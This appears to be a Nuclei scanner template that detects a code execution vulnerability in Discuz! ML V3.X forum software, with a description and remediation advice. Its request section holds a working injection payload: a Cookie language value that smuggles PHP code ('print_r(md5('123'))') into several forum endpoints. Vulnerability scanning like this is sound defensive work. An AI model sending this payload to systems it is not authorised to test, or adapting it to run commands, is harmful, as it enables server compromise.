id: Discuz-ece-language
info:
  name: Discuz ML! V3.X include_once template code execution
  author:
  - 折跃
  description: |-
    Discuz! ML V3.X code execution vulnerability.
    Discuz! is a generic community forum software system.

    Discuz! ML V3.X has a code execution vulnerability. An attacker can exploit it to execute system commands.
  severity: critical
  remediation: |-
    Official Fix:
    1. It is recommended that users obtain the latest patch or the latest version from the official site:
    http://discuz.net/

    Temporary Fix:
    1. When executing functions that can evaluate strings as code, strictly validate the parameters passed by the user, and avoid letting users control parameters when possible.
    2. Validate request content, filter malicious code and various bypass techniques such as case variations and BASE64 encoding, and restrict submissions.
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code==200
    - contains(body,'202cb962ac59075b964b07152d234b70')
  extractors:
  - name: tmpCookie
    type: regex
    regex:
    - httponly,(.*)language'
    group: 1
    part: body
    internal: true
  path:
  - '{{BaseURL}}/{{varPath}}'
  attack: batteringram
  method: GET
  payloads:
    varPath:
    - portal.php
    - forum.php
    - search.php
    - home.php
    - member.php
    - group.php
    - connect.php
    - plugin.php
  headers:
    Cookie: '{{tmpCookie}}language=en''.print_r(md5(''123'')).'';'
    Host: '{{Hostname}}'
  req-condition: true
  stop-at-first-match: true
variables:
  verify: '{{rand_text_alphanumeric(32,"")}}'
